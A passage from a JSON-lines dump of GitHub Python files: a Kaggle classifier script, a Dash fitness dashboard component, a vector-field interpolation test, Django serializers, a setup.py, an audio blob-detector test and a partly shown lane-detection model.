1000,1000 (without FN and Upc and using eucledean for DD)\n #CV:0.963210 ,sigmoid, max_epochs =265 , Dense = 500,500 (without FN and Upc and using eucledean for DD)\n #CV:0.962284 ,sigmoid, max_epochs =266 , Dense = 500,500 (without FN and Upc and using eucledean for DD & no np.log )*** current best\n #CV:0.965358 ,sigmoid, max_epochs =227 , Dense = 500,500 (without FN and Upc and using eucledean for DD & 
autoencoder)\n\n ##----------------------------------------------------------------------------------------------------------------##\n clf = build_mlp(Train_DS.shape[1],len(np.unique(y)))\n\n #clf = build_rnn(Train_DS.shape[1],len(np.unique(y)))\n\n #Train_DS, y = shuffle(Train_DS, y, random_state=123)\n clf.fit(Train_DS, y)\n\n # _, X_valid, _, y_valid = clf.train_test_split(Train_DS, y, clf.eval_size)\n # probas = clf.predict_proba(X_valid)[:,0]\n # print(\"ROC score\", metrics.roc_auc_score(y_valid, probas))\n\n print(\"done in %0.3fs\" % (time() - t0))\n\n sys.exit(0)\n\n #Predict actual model\n pred_Actual = clf.predict_proba(Actual_DS)\n print(\"Actual Model predicted\")\n\n #Get the predictions for actual data set\n\n preds = pd.DataFrame(pred_Actual, index=Sample_DS.VisitNumber.values, columns=Sample_DS.columns[1:])\n preds.to_csv(file_path+'output/Submission_Roshan_NN5.csv', index_label='VisitNumber')\n\n print(\"***************Ending NN1 Classifier***************\")\n return pred_Actual\n\n########################################################################################################################\n#Main module #\n########################################################################################################################\ndef main(argv):\n\n pd.set_option('display.width', 200)\n pd.set_option('display.height', 500)\n\n warnings.filterwarnings(\"ignore\")\n\n global file_path, Train_DS1, Featimp_DS, Mlogloss_scorer, HLContrib_DS, HLContrib_DS_2, Autoencoder_DS\n\n # Mlogloss\n Mlogloss_scorer = metrics.make_scorer(multiclass_log_loss, greater_is_better = False)\n\n random.seed(42)\n np.random.seed(42)\n\n if(platform.system() == \"Windows\"):\n\n file_path = 'C:/Python/Others/data/Kaggle/Walmart_Recruiting_TTC/'\n else:\n file_path = '/home/roshan/Desktop/DS/Others/data/Kaggle/Walmart_Recruiting_TTC/'\n\n########################################################################################################################\n#Read the input file , munging and splitting the data to train and test\n########################################################################################################################\n # Train_DS = pd.read_csv(file_path+'train_Grouped5_withFNnumber.csv',sep=',')\n # Actual_DS = pd.read_csv(file_path+'test_Grouped5_withFNnumber.csv',sep=',')\n Sample_DS = pd.read_csv(file_path+'sample_submission.csv',sep=',')\n #HLContrib_DS = pd.read_csv(file_path+'High_Lowest_Contributors_utilities_new.csv',sep=',',index_col=0)\n #HLContrib_DS = pd.read_csv(file_path+'High_Lowest_Contributors_utilities.csv',sep=',',index_col=0)\n #Autoencoder_DS = pd.read_csv(file_path+'Autoencoder_output.csv',sep=',',index_col=0)\n\n Create_file = False\n count = 5000\n\n ifile = 5\n\n if Create_file:\n Train_DS = pd.read_csv(file_path+'train_Grouped_withFNnumber_'+str(ifile)+'.csv',sep=',')\n Actual_DS = pd.read_csv(file_path+'test_Grouped_withFNnumber_'+str(ifile)+'.csv',sep=',')\n\n print(np.shape(Train_DS))\n print(np.shape(Actual_DS))\n ##----------------------------------------------------------------------------------------------------------------##\n # Train_DS = (Train_DS.reindex(np.random.permutation(Train_DS.index))).reset_index(drop=True)\n # Train_DS = Train_DS.head(count)\n # pd.DataFrame(Train_DS).to_csv(file_path+'train_Grouped_withFNnumber_temp_'+str(ifile)+'.csv')\n #\n # Actual_DS = (Actual_DS.reindex(np.random.permutation(Actual_DS.index))).reset_index(drop=True)\n # Actual_DS = Actual_DS.head(count)\n # 
pd.DataFrame(Actual_DS).to_csv(file_path+'test_Grouped_withFNnumber_temp_'+str(ifile)+'.csv')\n #\n # print(np.shape(Train_DS))\n # print(np.shape(Actual_DS))\n\n else:\n Train_DS = pd.read_csv(file_path+'train_50000.csv',sep=',',index_col=0,nrows = count)\n Actual_DS = pd.read_csv(file_path+'test_50000.csv',sep=',',index_col=0,nrows = count)\n #Train_DS = (Train_DS.reindex(np.random.permutation(Train_DS.index))).reset_index(drop=True)\n\n #Train_DS = pd.read_csv(file_path+'train_Grouped_withFNnumber_temp_'+str(ifile)+'.csv',sep=',', index_col=0,nrows = count).reset_index(drop=True)\n #Actual_DS = pd.read_csv(file_path+'test_Grouped_withFNnumber_temp_'+str(ifile)+'.csv',sep=',', index_col=0,nrows = count).reset_index(drop=True)\n\n ##----------------------------------------------------------------------------------------------------------------##\n\n Train_DS, Actual_DS, y = Data_Munging(Train_DS,Actual_DS)\n\n pred_Actual = XGB_Orig_binlog_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n #pred_Actual = XGB_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n #pred_Actual = XGB_Classifier1(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n #pred_Actual = RFC_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n pred_Actual = Misc_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n #pred_Actual = NN1_Classifier(Train_DS, y, Actual_DS, Sample_DS, Grid=False)\n########################################################################################################################\n#Main program starts here #\n########################################################################################################################\nif __name__ == \"__main__\":\n main(sys)","repo_name":"roshankr/DS_Competition","sub_path":"WR_TTC_v04.py","file_name":"WR_TTC_v04.py","file_ext":"py","file_size_in_byte":45686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"69997582910","text":"import numpy as np\n\ndef multiply_vectors():\n # Get the user input for the first vector\n vector1 = input(\"Enter the first vector (separated by spaces): \")\n vector1 = list(map(int, vector1.split()))\n\n # Get the user input for the second vector\n vector2 = input(\"Enter the second vector (separated by spaces): \")\n vector2 = list(map(int, vector2.split()))\n\n try:\n # Multiply the vectors using numpy\n result = np.multiply(vector1, vector2)\n \n # Print the result\n print(\"Result: \", result)\n \n except ValueError:\n # Handle the exception if the vectors are not of the same length\n print(\"Error: Vectors must be of the same length\")\n\nif __name__ == \"__main__\":\n multiply_vectors()\n","repo_name":"DSAatUSU/ChatGPT-promises-and-pitfalls","sub_path":"3.5turbo/mathematics/linear-algebra/is-a-calculator-that-multiplies-two-vectors.py","file_name":"is-a-calculator-that-multiplies-two-vectors.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"32469662614","text":"from typing import List, Tuple\n\nimport plotly.express as px\nimport plotly.graph_objects as go\nfrom dash import html, dcc\nimport dash_bootstrap_components as dbc\nfrom dash.development.base_component import Component\n\nfrom shyft.app.view.dash_components.base import BaseDashComponentFactory\nfrom shyft.logger import get_logger\n\n_logger = get_logger(__name__)\n\n\nclass OverviewComponentFactory(BaseDashComponentFactory):\n \"\"\"A class for generating Dash 
components used in an overview of\n multiple activities.\n \"\"\"\n\n def page_heading(self) -> Component:\n return html.H1(f'Activity overview for {self.config.user_name}')\n\n def weekday_count(self) -> Component:\n _logger.debug('Generating weekday count graph.')\n counts = self.summary.groupby(['activity_type', 'day']).count()['activity_id'].rename('count')\n for act_type in counts.index.levels[0]:\n for day in self.config.days_of_week:\n if day not in counts[act_type]:\n counts.loc[act_type, day] = 0\n counts.sort_index(level=1, key=lambda i: i.map(self.config.days_of_week.index), inplace=True)\n bars = []\n for act_type in counts.index.levels[0]:\n bars.append(go.Bar(name=act_type, x=self.config.days_of_week, y=counts[act_type]))\n fig = go.Figure(data=bars)\n fig.update_layout(barmode='stack', title='Most active days of the week')\n return dcc.Graph(id='weekday_count', figure=fig)\n\n def _axis_labels(self, data_name: str) -> Tuple[str, str]:\n \"\"\"\n Get appropriate DataFrame column name and readable axis label. \n\n :param data_name: Describes what data we want to display. See docs for `main_scatter_fig` and `main_time_fig`\n methods for permitted values.\n :return: A 2-tuple containing the name of the relevant column in the `summary` DataFrame as the first element,\n and the axis label to display to the user as the second element.\n \"\"\"\n\n # Single activity attributes (column name must be present in summary dataframe)\n if data_name == 'distance':\n if self.config.distance_unit == 'km':\n return 'distance_2d_km', 'Distance (km)'\n elif self.config.distance_unit == 'mile':\n return 'distance_2d_mile', 'Distance (miles)'\n elif data_name == 'duration':\n return 'duration', 'Duration (minutes)'\n\n # These can be used for either single activities (summary dataframe) or aggregates (time series dataframe)\n elif data_name == 'mean_speed':\n if self.config.distance_unit == 'km':\n return 'mean_kmph', 'Average speed (km/hour)'\n elif self.config.distance_unit == 'mile':\n return 'mean_mph', 'Average speed (miles/hour)'\n elif data_name == 'mean_hr':\n return 'mean_hr', 'Average heart rate (beats/minute)'\n\n # Aggregate attributes (column name must be present in time series dataframe)\n elif data_name == 'total_distance':\n if self.config.distance_unit == 'km':\n return 'total_distance_2d_km', 'Total distance (km)'\n elif self.config.distance_unit == 'mile':\n return 'total_distance_2d_mile', 'Total distance (miles)'\n elif data_name == 'total_duration':\n return 'total_duration', 'Total duration (minutes)'\n elif data_name == 'activity_count':\n return 'activity_count', 'Number of activities'\n\n else:\n raise ValueError(f'Bad value for `data_name`: \"{data_name}\".')\n\n\n def main_scatter_fig(self, x: str, y: str) -> go.Figure:\n \"\"\"\n Generate the main scatter plot figure.\n\n :param x: What to display on the x axis. Should be one of `distance`, `mean_speed`, `duration` or `mean_hr`.\n :param y: What to display on the y axis. 
Has the same permitted values as `x`.\n :return: A go.Figure object representing the scatter plot.\n \"\"\"\n x_col, x_label = self._axis_labels(x)\n y_col, y_label = self._axis_labels(y)\n fig = px.scatter(\n self.summary,\n x=x_col,\n y=y_col,\n labels={\n x_col: x_label,\n y_col: y_label,\n 'activity_type': 'Activity type'\n },\n color='activity_type',\n custom_data=['activity_id']\n )\n fig.update_layout(clickmode='event+select')\n return fig\n\n\n def main_scatterplot(self) -> Component:\n \"\"\"\n A configurable scatterplot of all activities.\n \"\"\"\n _logger.debug('Generating main scatterplot.')\n\n x_dropdown = dcc.Dropdown(id='overview_main_scatterplot_x_dropdown', options=[\n {'label': 'Distance', 'value': 'distance'},\n {'label': 'Average speed', 'value': 'mean_speed'},\n {'label': 'Average heart rate', 'value': 'mean_hr'},\n {'label': 'Duration', 'value': 'duration'}\n ], value='distance')\n y_dropdown = dcc.Dropdown(id='overview_main_scatterplot_y_dropdown', options=[\n {'label': 'Distance', 'value': 'distance'},\n {'label': 'Average speed', 'value': 'mean_speed'},\n {'label': 'Average heart rate', 'value': 'mean_hr'},\n {'label': 'Duration', 'value': 'duration'}\n ], value='mean_speed')\n\n button = dbc.Button('View selected activities', id='overview_main_scatterplot_button')\n link = html.A(button, href='/activities', id='overview_main_scatterplot_link', target='_blank')\n\n config_row = dbc.Row([\n dbc.Col(html.Div(['x axis:', x_dropdown])),\n dbc.Col(html.Div(['y axis:', y_dropdown])),\n dbc.Col(link, width='auto')\n ], justify='center')\n\n graph = dcc.Graph(\n id='overview_main_scatterplot',\n figure=self.main_scatter_fig('distance', 'mean_speed')\n )\n\n return html.Div([\n html.H2('Scatter plot'), config_row, graph\n ])\n\n _TIME_CHART_TYPES = {\n 'mean_speed': px.line,\n 'total_distance': px.bar,\n 'total_duration': px.bar,\n 'mean_hr': px.line,\n 'activity_count': px.bar\n }\n\n def main_time_fig(self, freq: str, y: str) -> go.Figure:\n \"\"\"\n Generate the chart figure for the main time plot.\n\n :param freq: What frequency to use for the plot. Should be one\n of \"weekly\" or \"monthly\".\n :param y: Value to display on the y axis. 
Should be one of\n \"mean_speed\", \"total_distance\", \"total_duration\",\n \"mean_hr\" or \"activity_count\".\n :return: A go.Figure object representing the appropriate chart.\n The type of the chart will depend on the type of data to be\n displayed on the y axis.\n \"\"\"\n if freq == 'weekly':\n df = self.activity_manager.metadata_weekly_time_series()\n date_label = 'Week of'\n elif freq == 'monthly':\n df = self.activity_manager.metadata_monthly_time_series()\n date_label = 'Month of'\n else:\n raise ValueError(f'`freq` must be one of \"weekly\" or \"monthly\", not \"{freq}\".')\n\n if y == 'total_duration':\n # Need to convert timedelta to number of minutes\n df[y] = df[y].dt.total_seconds() / 60\n\n y_col, y_label = self._axis_labels(y)\n return self._TIME_CHART_TYPES[y](\n df,\n y=y_col,\n labels={\n 'date': date_label,\n y_col: y_label\n },\n )\n\n def main_time_chart(self) -> Component:\n \"\"\"\n A line chart plotting some selected value over time.\n \"\"\"\n _logger.debug('Generating time graph.')\n df = self.activity_manager.metadata_weekly_time_series(activity_type='run')\n\n freq_dropdown = dcc.Dropdown(id='overview_main_time_chart_freq_dropdown', options=[\n {'label': 'Weekly', 'value': 'weekly'},\n {'label': 'Monthly', 'value': 'monthly'}\n ], value='monthly')\n\n y_dropdown = dcc.Dropdown(id='overview_main_time_chart_y_dropdown', options=[\n {'label': 'Average speed', 'value': 'mean_speed'},\n {'label': 'Total distance', 'value': 'total_distance'},\n {'label': 'Total duration', 'value': 'total_duration'},\n {'label': 'Average heart rate', 'value': 'mean_hr'},\n {'label': 'Number of activities', 'value': 'activity_count'}\n ], value='activity_count')\n\n graph = dcc.Graph(\n id='overview_main_time_chart',\n figure=self.main_time_fig('weekly', 'activity_count')\n )\n return html.Div([\n html.H2('Progress over time'),\n dbc.Row([\n dbc.Col(html.Div(['Frequency:', freq_dropdown])),\n dbc.Col(html.Div(['y axis:', y_dropdown]))\n ]),\n graph\n ])\n\n def custom_graphs(self) -> List[Component]:\n \"\"\"Generate all graphs based on the contents of config.overview_graphs\n (which is in turn generated based on the contents of test_overview_graphs.json).\n\n See docs/graphs.rst for help on how test_overview_graphs.json is interpreted.\n \"\"\"\n graphs = []\n # TODO: Figure this out\n for i, go_data in enumerate(self.config.overview_graphs):\n groupby = go_data.pop('groupby', None)\n agg = go_data.pop('agg', None)\n if groupby and agg:\n data = getattr(self.summary.groupby(groupby), agg)()\n else:\n data = self.summary\n graphs.append(\n dbc.Row(\n dbc.Col(\n dcc.Graph(\n id=f'graph_{i}',\n figure=self.graph(data, go_data.pop('graph_type'), **go_data)\n )\n )\n )\n )\n return graphs\n\n def graphs_or_no_activity_msg(self, markdown: str = 'No recent activities found. 
Upload some!') -> Component:\n        if self.activity_manager.activity_ids:\n            _logger.debug('Activities found; generating graphs.')\n            return html.Div([\n                html.H2('Analysis'),\n                self.weekday_count(),\n                self.main_scatterplot(),\n                self.main_time_chart(),\n                *self.custom_graphs(),\n            ])\n        else:\n            _logger.debug('No activities found; returning markdown.')\n            return dcc.Markdown(markdown)\n","repo_name":"bunburya/shyft","sub_path":"shyft/app/view/dash_components/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":10563,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"39566369668","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport time\nplt.rcParams['figure.dpi'] = 500\nimport Divergence_Free_Interpolant as dfi\n\nnp.random.seed(69)\ndiv = lambda n, d: np.divide(n, d, out = np.zeros_like(d), where=d!=0)\n\n## Analytic vectorfield definition; has to be divergence free\nvector_field = lambda x, y: np.array([-2*x**3 * y, 3*x**2 * y**2])\n\n## Number of sample points\nN = 25\n\n## Random sample points\nX, Y = np.random.rand(N), np.random.rand(N)\n\n## Get vectorfield sample values\nUV = vector_field(X, Y)\nU, V = UV[0], UV[1]\n\nS = (U**2 + V**2)**0.5\n\n## Visualize vectorfield\nfig, ax = plt.subplots(1, 1)\nquiver = ax.quiver(X, Y, div(U, S), div(V, S), S, cmap ='autumn')\nax.set_aspect('equal')\nax.set_xlim(0,1)\nax.set_ylim(0,1)\nfig.colorbar(quiver)\nplt.show()\nplt.close()\n\n## Initialize the interpolant, nu = 5, k = 3 will suffice almost always, dim is the dimensionality\n## default \ninitialized_interpolant = dfi.interpolant(nu = 5, k = 3, dim = 2)\n\n## Condition the vectorfield \n## initialized_interpolant.condition(positions, vectors, support_radius, method)\n## positions: np.ndarray, (dim, N)\n## vectors: np.ndarray, (dim, N)\n## support_radius: positive float\n## method: string : default = linsolve: options = [SVD, penrose, linsolve, lstsq]\nt1 = time.perf_counter()\ninitialized_interpolant.condition(np.array([X, Y]).T, UV.T, 1)\nprint('Conditioning time: ', time.perf_counter() - t1)\n\n## Create resampling points\n_n, _m = 100, 100\nXX, YY = np.mgrid[0:1:_n*1j, 0:1:_m*1j]\n\n## Call the interpolant passing resampling coordinates\n## initialized_interpolant(X, Y)\n## X: np.ndarray : any_shape\n## Y: np.ndarray : shape like X\n## returns np.ndarray: X.shape + (dim,)\nt1 = time.perf_counter()\nUV = initialized_interpolant(XX, YY)\nprint('Time per interpolation: ', (time.perf_counter() - t1)/(_n*_m))\nUU = UV[:,:,0]\nVV = UV[:,:,1]\nSS = (UU**2 + VV**2)**0.5\n\n## Visualize interpolated field\n\nfig, ax = plt.subplots(1,1)\nstream = ax.streamplot(XX.T, YY.T, div(UU, SS).T, div(VV, SS).T, color = SS.T, density = 1, cmap ='autumn')\nfig.colorbar(stream.lines)\nax.set_aspect('equal')\nplt.show()\nplt.close()","repo_name":"Peteris-Zvejnieks/DivergenceFreeInterpolation","sub_path":"tests/test_case_2D.py","file_name":"test_case_2D.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23296741163","text":"'''For serializing all data'''\n\nfrom .models import BusinessProfile, Profile\nfrom rest_framework import serializers\nfrom rest_framework.renderers import JSONRenderer\n\nclass ProfileSerializer(serializers.ModelSerializer):\n    #Serializing all user profiles\n\n    class Meta:\n        model = Profile\n        fields = [\n            'username',\n            'first_name',\n            'last_name',\n            'email',\n            'date_joined',\n            'phone',\n            'wallet',\n 
'profile_type'\n ]\n\nclass BusinessProfileSerializer(serializers.ModelSerializer):\n #Serializing Business profile\n\n class Meta:\n model = BusinessProfile\n fields = [\n 'user',\n 'business_name',\n 'register_date',\n 'pan_number',\n 'pan_name',\n 'address',\n 'pincode',\n 'city',\n 'state',\n 'service',\n ]\n","repo_name":"mittaltushar014/mera_pay_payments_gateway","sub_path":"business/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"10039713695","text":"\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name='asoc_members',\n version='0.1.0',\n\n # This is a one-line description or tagline of what your project does. This\n # corresponds to the \"Summary\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#summary\n description=\"Memberships management for the Python Argentina's ONG\",\n\n long_description=long_description,\n long_description_content_type='text/markdown',\n\n # This should be a valid link to your project's main homepage.\n #\n # This field corresponds to the \"Home-Page\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#home-page-optional\n url='https://ac.python.org.ar/',\n\n # This should be your name or the name of the organization which owns the\n # project.\n author='Asociación Civil Python Argentina', # Optional\n\n # This should be a valid email address corresponding to the author listed\n # above.\n author_email='presidencia@ac.python.org.ar', # Optional\n\n # Classifiers help users find your project by categorizing it.\n #\n # For a list of valid classifiers, see https://pypi.org/classifiers/\n classifiers=[ # Optional\n 'Development Status :: 1 - Planning',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n\n # Pick your license as you wish\n 'License :: OSI Approved :: MIT License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Framework :: Django :: 2.0',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n\n keywords='python argentina pyar django memberships ong', # Optional\n\n # You can just specify package directories manually here if your project is\n # simple. 
Or you can use find_packages().\n    #\n    # Alternatively, if you just want to distribute a single Python file, use\n    # the `py_modules` argument instead as follows, which will expect a file\n    # called `my_module.py` to exist:\n    #\n    #   py_modules=[\"my_module\"],\n    #\n    packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n\n    install_requires=[\n        'django',\n        'Pillow',\n        'django-extensions',\n    ],\n    scripts=['website/manage.py'],\n\n    # List additional URLs that are relevant to your project as a dict.\n    #\n    # This field corresponds to the \"Project-URL\" metadata fields:\n    # https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use\n    #\n    # Examples listed include a pattern for specifying where the package tracks\n    # issues, where the source is hosted, where to say thanks to the package\n    # maintainers, and where to support the project financially. The key is\n    # what's used to render the link text on PyPI.\n    project_urls={ # Optional\n        'Bug Reports': 'https://github.com/PyAr/asoc_members/issues',\n        'About us': 'https://ac.python.org.ar/',\n        'Source': 'https://github.com/PyAr/asoc_members/',\n    },\n)","repo_name":"PyAr/asoc_members","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"60"} +{"seq_id":"34076792515","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 7 15:41:54 2020\n\n@author: xavier.mouy\n\n\"\"\"\n\n# import sys\n# sys.path.append(\"..\") # Adds higher directory to python modules path.\nfrom ecosound.core.audiotools import Sound\nfrom ecosound.core.spectrogram import Spectrogram\n#from ecosound.core.measurement import Measurement\nfrom ecosound.detection.detector_builder import DetectorFactory\nfrom ecosound.visualization.grapher_builder import GrapherFactory\nfrom ecosound.measurements.measurer_builder import MeasurerFactory\nimport time\n\n## Input parameters ##########################################################\n\n#single_channel_file = r\"../ecosound/resources/67674121.181018013806.wav\"\n#single_channel_file = r\"../ecosound/resources/JASCOAMARHYDROPHONE742_20140913T084017.774Z.wav\"\n#single_channel_file = r\"C:\\Users\\xavier.mouy\\Documents\\PhD\\Projects\\Dectector\\datasets\\DFO_snake-island_rca-in_20181017\\audio_data\\67674121.181018040806.wav\"\n\nsingle_channel_file = r'C:\\Users\\xavier.mouy\\Documents\\Projects\\2022_DFO_fish_catalog\\Darienne_data\\Taylor-Islet_LA_dep2\\data\\6\\AMAR173.6.20220821T180710Z.wav'\n\n\n# Spectrogram parameters\nframe = 0.0625 #3000\nnfft = 0.0853 # 4096\nstep = 0.01 # 500\n#ovlp = 2500\nfmin = 0\nfmax = 5000\nwindow_type = 'hann'\n\n# start and stop time of wavfile to analyze\nt1 = 700 #197 #22#24\nt2 = 800 #217 #40#24#40\n## ###########################################################################\ntic = time.perf_counter()\n\n# load audio data\nsound = Sound(single_channel_file)\nsound.read(channel=0, chunk=[t1, t2], unit='sec', detrend=True)\n\n# Calculates spectrogram\nspectro = Spectrogram(frame, window_type, nfft, step, sound.waveform_sampling_frequency, unit='sec')\nspectro.compute(sound, dB=True, use_dask=True, dask_chunks=40)\n\n# Crop unused frequencies\nspectro.crop(frequency_min=fmin, frequency_max=fmax, inplace=True)\n\n# Denoise\nspectro.denoise('median_equalizer', window_duration=3, use_dask=True, dask_chunks=(2048,1000), inplace=True)\n\n# Detector\ndetector = DetectorFactory('BlobDetector', use_dask=True, dask_chunks=(2048,2000), 
kernel_duration=0.1, kernel_bandwidth=300, threshold=10, duration_min=0.05, bandwidth_min=40)\ndetections = detector.run(spectro, debug=False)\n\ntoc = time.perf_counter()\nprint(f\"Executed in {toc - tic:0.4f} seconds\")\n\n# Plot\ngraph = GrapherFactory('SoundPlotter', title='Recording', frequency_max=1000)\ngraph.add_data(sound)\ngraph.add_annotation(detections, panel=0, color='grey',label='Detections')\ngraph.add_data(spectro)\ngraph.add_annotation(detections, panel=1,color='black',label='Detections')\ngraph.colormap = 'binary'\n#graph.colormap = 'jet'\ngraph.show()\n\n\n\n\n## To test the .crop method\n#detecSpectro = spectro.crop(time_min=2,time_max=10, inplace=False)\n#detecSpectro = spectro.crop(time_max=10, inplace=False)\n#detecSpectro = spectro.crop(frequency_min=50, inplace=False)\n#detecSpectro = spectro.crop(frequency_max=800,inplace=False)\n# detecSpectro = spectro.crop(frequency_min=0,frequency_max=600,time_min=10,time_max=10.3, inplace=False)\n# graph = GrapherFactory('SoundPlotter', title='Detection', frequency_max=1000)\n# graph.add_data(detecSpectro)\n# graph.show()\n\n\n\n","repo_name":"xaviermouy/ecosound","sub_path":"tests/old_tests/blob_detector.py","file_name":"blob_detector.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"31505324584","text":"import numpy as np\nimport torch\nfrom model.backbone import resnet\n# from model.layer import CoordConv\nfrom model.seg_model import SegHead\n# from torch.nn import functional as F\n# from utils.common import initialize_weights\n\n\nclass parsingNet(torch.nn.Module):\n def __init__(self, pretrained=True, backbone='50', num_grid_row = None, num_cls_row = None, \\\n num_grid_col = None, num_cls_col = None, num_lane_on_row = None, num_lane_on_col = None, \\\n use_aux=False,input_height = None, input_width = None, fc_norm = False,cls_lane=5,train_method=0):\n super(parsingNet, self).__init__()\n self.num_grid_row = num_grid_row\n self.num_cls_row = num_cls_row\n self.num_grid_col = num_grid_col\n self.num_cls_col = num_cls_col\n self.num_lane_on_row = num_lane_on_row\n self.num_lane_on_col = num_lane_on_col\n self.use_aux = use_aux\n self.train_method = train_method\n self.num_lane = 4\n self.cls_lane = cls_lane\n self.cls_out = self.num_lane*self.cls_lane # num_lane * cls_lane \n \n self.dim1 = self.num_grid_row * self.num_cls_row * self.num_lane_on_row\n self.dim2 = self.num_grid_col * self.num_cls_col * self.num_lane_on_col\n self.dim3 = 2 * self.num_cls_row * self.num_lane_on_row\n self.dim4 = 2 * self.num_cls_col * self.num_lane_on_col\n self.total_dim = self.dim1 + self.dim2 + self.dim3 + self.dim4 + self.cls_out\n \n self.input_dim = input_height // 32 * input_width // 32 * 8\n\n if self.train_method==0 or self.train_method==1:\n self.model = resnet(backbone, pretrained=pretrained).requires_grad_(requires_grad=True)\n if backbone in ['34','18', '34fca']:\n self.pool = torch.nn.Conv2d(512,256,1).requires_grad_(requires_grad=True) \n else:\n raise ValueError\n # 57600 32400 576 648 20\n print('self.dim1,self.dim2,self.dim3,self.dim4,self.cls_out: ',self.dim1,self.dim2,self.dim3,self.dim4,self.cls_out)\n self.cls_loc_row = torch.nn.Sequential(\n torch.nn.Conv2d(32,4,3,1),\n torch.nn.Flatten(),\n torch.nn.LayerNorm(1536) if fc_norm else torch.nn.Identity(),\n torch.nn.ReLU(),\n torch.nn.Linear(1536,self.dim1) # 57600)\n ).requires_grad_(requires_grad=True)\n self.cls_loc_col = torch.nn.Sequential(\n 
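# note: same head pattern as cls_loc_row above (conv -> flatten -> LayerNorm/Identity -> ReLU -> linear), here sized to self.dim2 for the column branch\n                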
torch.nn.Conv2d(32,4,3,1),\n                torch.nn.Flatten(),\n                torch.nn.LayerNorm(1536) if fc_norm else torch.nn.Identity(),\n                torch.nn.ReLU(),\n                torch.nn.Linear(1536,self.dim2) #32400)\n            ).requires_grad_(requires_grad=True)\n            \n            self.cls_ext_row = torch.nn.Sequential(\n                torch.nn.Conv2d(32,2,3,2),\n                torch.nn.Flatten(),\n                torch.nn.LayerNorm(192) if fc_norm else torch.nn.Identity(),\n                torch.nn.ReLU(),\n                torch.nn.Linear(192,self.dim3) #576)\n            ).requires_grad_(requires_grad=True)\n            self.cls_ext_col = torch.nn.Sequential(\n                torch.nn.Conv2d(32,2,3,2),\n                torch.nn.Flatten(),\n                torch.nn.LayerNorm(192) if fc_norm else torch.nn.Identity(),\n                torch.nn.ReLU(),\n                torch.nn.Linear(192,self.dim4) #648) \n            ).requires_grad_(requires_grad=True)\n        else:\n            self.model = resnet(backbone, pretrained=pretrained).requires_grad_(requires_grad=False) \n            if backbone in ['34','18', '34fca']:\n                self.pool = torch.nn.Conv2d(512,256,1).requires_grad_(requires_grad=False) \n            else:\n                raise ValueError\n            # 57600 32400 576 648 20\n            # print('self.dim1,self.dim2,self.dim3,self.dim4,self.cls_out: ',self.dim1,self.dim2,self.dim3,self.dim4,self.cls_out)\n            self.cls_loc_row = torch.nn.Sequential(\n                torch.nn.Conv2d(32,4,3,1),\n                torch.nn.Flatten(),\n                torch.nn.LayerNorm(1536) if fc_norm else torch.nn.Identity(),\n                torch.nn.ReLU(),\n                torch.nn.Linear(1536,self.dim1)# 57600)\n            ).requires_grad_(requires_grad=False) \n            self.cls_loc_col = torch.nn.Sequential(\n                torch.nn.Conv2d(32,4,3,1),\n                torch.nn.Flatten(),\n                torch.nn.LayerNorm(1536) if fc_norm else torch.nn.Identity(),\n                torch.nn.ReLU(),\n                torch.nn.Linear(1536,self.dim2) #32400)\n            ).requires_grad_(requires_grad=False) \n            \n            self.cls_ext_row = torch.nn.Sequential(\n                torch.nn.Conv2d(32,2,3,2),\n                torch.nn.Flatten(),\n                torch.nn.LayerNorm(192) if fc_norm else torch.nn.Identity(),\n                torch.nn.ReLU(),\n                torch.nn.Linear(192,self.dim3) #576)\n            ).requires_grad_(requires_grad=False) \n            self.cls_ext_col = torch.nn.Sequential(\n                torch.nn.Conv2d(32,2,3,2),\n                torch.nn.Flatten(),\n                torch.nn.LayerNorm(192) if fc_norm else torch.nn.Identity(),\n                torch.nn.ReLU(),\n                torch.nn.Linear(192,self.dim4)#648) \n            ).requires_grad_(requires_grad=False) \n        if self.train_method==0 or self.train_method==2:\n            self.cls_lan_cls = torch.nn.Sequential(\n                torch.nn.Conv2d(256,128,3,2),\n                torch.nn.Conv2d(128,4,3,2),\n                torch.nn.Flatten(),\n                torch.nn.LayerNorm(384) if fc_norm else torch.nn.Identity(),\n                torch.nn.ReLU(),\n                torch.nn.Linear(384,self.cls_out)).requires_grad_(requires_grad=True)\n        else:\n            self.cls_lan_cls = torch.nn.Sequential(\n                torch.nn.Conv2d(256,128,3,2),\n                torch.nn.Conv2d(128,4,3,2),\n                torch.nn.Flatten(),\n                torch.nn.LayerNorm(384) if fc_norm else torch.nn.Identity(),\n                